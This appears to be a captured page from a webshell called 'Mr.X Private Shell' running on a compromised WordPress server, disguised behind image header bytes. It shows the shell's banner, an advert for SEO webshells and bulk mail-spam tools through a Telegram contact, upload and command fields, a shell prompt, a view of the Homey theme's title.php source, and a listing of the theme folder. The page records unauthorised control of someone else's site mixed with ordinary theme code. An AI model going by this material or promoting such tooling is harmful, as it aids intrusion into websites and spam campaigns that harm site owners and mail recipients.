����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.143: ~ $
<?php
global $post, $homey_prefix, $experience_author;
$address = '';//homey_get_experience_data('experience_full_address');
$address = '';//empty($address) ? homey_get_experience_data('experience_address') : $address ;

$is_superhost = $experience_author['is_superhost'];

$rating = homey_option('experience_rating');
$total_rating = get_post_meta( $post->ID, 'experience_total_rating', true );

$homey_permalink = get_the_permalink();
$homey_permalink_review_link = $homey_permalink.'#reviews-section';
?>
<div class="title-section">
    <div class="block-top-title">
        <div class="block-body">
            <?php get_template_part('template-parts/breadcrumb'); ?>
            <h1 class="listing-title"><?php the_title(); ?> <?php homey_experience_featured(get_the_ID()); ?></h1>
            <?php if($rating && ($total_rating != '' && $total_rating != 0 ) ) { ?>
                <div class="rating">
                    <?php echo homey_get_review_v2($total_rating, $post->ID, $homey_permalink_review_link, 'experience'); ?>
                </div>
            <?php } ?>
            <?php get_template_part('single-experience/item-address', null, array('address_tag_class' => 'item-address', 'prefix_address' => '<i class="homey-icon homey-icon-style-two-pin-marker"></i>', 'postfix_address' => '')); ?>
            <?php if(!empty($address)) { ?>
                <address><i class="homey-icon homey-icon-style-two-pin-marker"></i> <?php echo esc_attr($address); ?></address>
            <?php } ?>

            <?php if($is_superhost) { ?>
                <div class="superhost-info-icon">
                    <i class="homey-icon homey-icon-single-neutral-circle"></i> <?php echo esc_html__('Superhost', 'homey');?>
                </div>
            <?php } ?>

            <?php if($is_superhost) { ?>
                <div class="host-avatar-wrap avatar">
                    <span class="super-host-icon">
                        <i class="homey-icon homey-icon-award-badge-1"></i>
                    </span>
                    <?php echo ''.$experience_author['photo']; ?>
                </div>
            <?php } ?>

            <div class="listing-contact-save hidden-xs">
                <?php
                $fav_icon_class = "homey-icon-love-it";
                $currentSaveText = esc_html__('Save', 'homey');
                if(homey_check_is_favorite($post->ID) > 0){
                    $fav_icon_class = "homey-icon-love-it-full-01";
                    $currentSaveText = esc_html('Saved', 'homey');
                } ?>
                <a class="add_exp_fav"
                   data-saved-text="<?php echo esc_html__('Saved', 'homey');?>"
                   data-save-text="<?php echo esc_html__('Save', 'homey');?>"
                   data-removed-text="<?php echo esc_html__('Removed', 'homey');?>"
                   data-remove-text="<?php echo esc_html__('Remove', 'homey');?>"

                   data-single-page="1" data-exp-id="<?php echo $post->ID; ?>"  href="javascript:void(0);"><i class="homey-icon <?php echo $fav_icon_class; ?>"></i><?php echo esc_html__($currentSaveText, 'homey');?></a>
                <a class="homey-print-experience" id="homey-print-experience" data-experience-id="<?php echo $post->ID; ?>" href="javascript:void(0);"><i class="homey-icon homey-icon-print-text"></i><?php echo esc_html__('Print', 'homey');?></a>
            </div>
        </div><!-- block-body -->
    </div><!-- block -->
</div><!-- title-section -->

Filemanager

Name Type Size Permission Actions
booking Folder 0755
about-commercial.php File 2.84 KB 0644
about-host.php File 840 B 0644
about-v1.php File 7.9 KB 0644
about-v2.php File 6.72 KB 0644
about.php File 277 B 0644
availability.php File 2.37 KB 0644
contact-form.php File 5.05 KB 0644
contact-host.php File 4.08 KB 0644
custom-periods.php File 2.06 KB 0644
details.php File 7.78 KB 0644
experience-nav.php File 3.81 KB 0644
extra-prices.php File 1.76 KB 0644
features.php File 1.87 KB 0644
gallery.php File 3.39 KB 0644
host.php File 4.4 KB 0644
item-address.php File 2.2 KB 0644
map.php File 1.5 KB 0644
prices-hourly.php File 6.45 KB 0644
prices.php File 1.37 KB 0644
providing.php File 3.31 KB 0644
reviews.php File 5.57 KB 0644
rules.php File 5.31 KB 0644
services.php File 1.59 KB 0644
share.php File 1.67 KB 0644
similar-experience.php File 2.29 KB 0644
single-experience-v1.php File 6.19 KB 0644
single-experience-v2.php File 5.75 KB 0644
single-experience-v3.php File 6.21 KB 0644
single-experience-v4.php File 5.86 KB 0644
single-experience-v5.php File 6.6 KB 0644
single-experience-v6.php File 6.58 KB 0644
title.php File 3.41 KB 0644
top-gallery-full-width.php File 1.54 KB 0644
top-gallery-grid-section.php File 1.78 KB 0644
top-gallery-variable-width.php File 1.01 KB 0644
top-gallery.php File 1.44 KB 0644
video.php File 1.54 KB 0644
what-nearby.php File 10.32 KB 0644